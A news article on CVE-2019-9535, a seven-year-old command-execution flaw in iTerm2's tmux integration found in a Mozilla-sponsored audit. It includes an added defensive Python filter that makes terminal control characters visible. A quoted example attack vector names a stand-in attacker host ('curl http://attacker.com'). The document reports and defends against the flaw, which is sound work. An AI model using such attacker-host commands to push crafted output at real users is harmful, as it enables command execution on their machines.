
Patch now, Mac users: Critical 7-year-old flaw in open-source macOS app iTerm2

October 13, 2019

The makers of iTerm2, a popular open-source terminal emulator app for macOS, have released a patch to address a critical flaw discovered during an audit sponsored by Firefox-maker Mozilla. 

Judging by Mozilla’s description, any developers or admins using the iTerm2 app should install the available patch immediately, and it sounds like the bug could be exploited in as-yet-unknown ways.

“An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla’s Tom Ritter writes. 

“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.” 
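As an added illustration (not code from Mozilla, iTerm2 or the original article), the Python filter below renders untrusted output with its control characters made visible, so escape sequences in a log line or HTTP response reach the terminal as inert text. It is a generic viewing precaution, not the fix for this CVE, which is the upgrade to iTerm2 3.3.6; the function names and the sample log line are constructed for the example.

```python
import sys

# Control characters passed through unchanged: tab and newline.
_KEEP = {0x09, 0x0A}


def neutralize(data: bytes) -> str:
    """Return text in which every terminal control character is made visible."""
    # Invalid UTF-8 (including raw 8-bit control bytes) becomes U+FFFD.
    text = data.decode("utf-8", errors="replace")
    out = []
    for ch in text:
        cp = ord(ch)
        if cp in _KEEP:
            out.append(ch)
        elif cp < 0x20 or cp == 0x7F:
            # C0 controls (ESC, BEL, CR, ...) in caret notation, like `cat -v`.
            out.append("^" + chr(cp ^ 0x40))
        elif 0x80 <= cp <= 0x9F:
            # C1 controls (8-bit forms of CSI, DCS, OSC, ...) shown as hex.
            out.append(f"\\x{cp:02x}")
        else:
            out.append(ch)
    return "".join(out)


def count_controls(data: bytes) -> int:
    """Count the control characters that neutralize() would rewrite."""
    text = data.decode("utf-8", errors="replace")
    return sum(
        1 for ch in text
        if ord(ch) not in _KEEP
        and (ord(ch) < 0x20 or ord(ch) == 0x7F or 0x80 <= ord(ch) <= 0x9F)
    )


# Constructed sample: a log line whose referer field carries an escape
# sequence (a harmless "set window title" sequence, used only as a stand-in).
SAMPLE = b'203.0.113.7 - "GET /" ref="\x1b]0;title\x07"\n'

if __name__ == "__main__":
    # Intended use (file name is hypothetical):
    #   tail -f /var/log/apache2/referer_log | python3 neutralize.py
    # Reads line by line so it also works on a stream that never ends.
    for line in sys.stdin.buffer:
        sys.stdout.write(neutralize(line))
        sys.stdout.flush()
```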

The bug was found in the tmux integration feature of iTerm2, where it’s been lurking for seven years. 

Mozilla opted to support the audit of iTerm2 because of its popularity with developers and admins, funding the audit from the Mozilla Open Source Support Program (MOSS). The audit was carried out by not-for-profit security consultancy Radically Open Security. MOSS has also supported the Tor Project, Tails, and whistleblower tip system SecureDrop.   

iTerm2 serves the same purpose as the native Terminal macOS app for those who use the command line. 

Mozilla notes that the vulnerability, which has been assigned the identifier CVE-2019-9535, does require some user interaction to exploit. But because it can be exploited through commands such as those above, it is potentially dangerous.

“This is a serious security issue because in some circumstances it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2,” iTerm2 developers explain in a note urging users to update. 

The fix is available in version 3.3.6 of iTerm2, which was released on October 9, a few days after a separate update that does not address the flaw.

iTerm2’s audit was sponsored by the third tranche of MOSS, which Mozilla created after the 2014 disclosure of Heartbleed, the bug in OpenSSL, a widely used open-source library for protecting communications between browsers and websites.

Credit: ZDNet
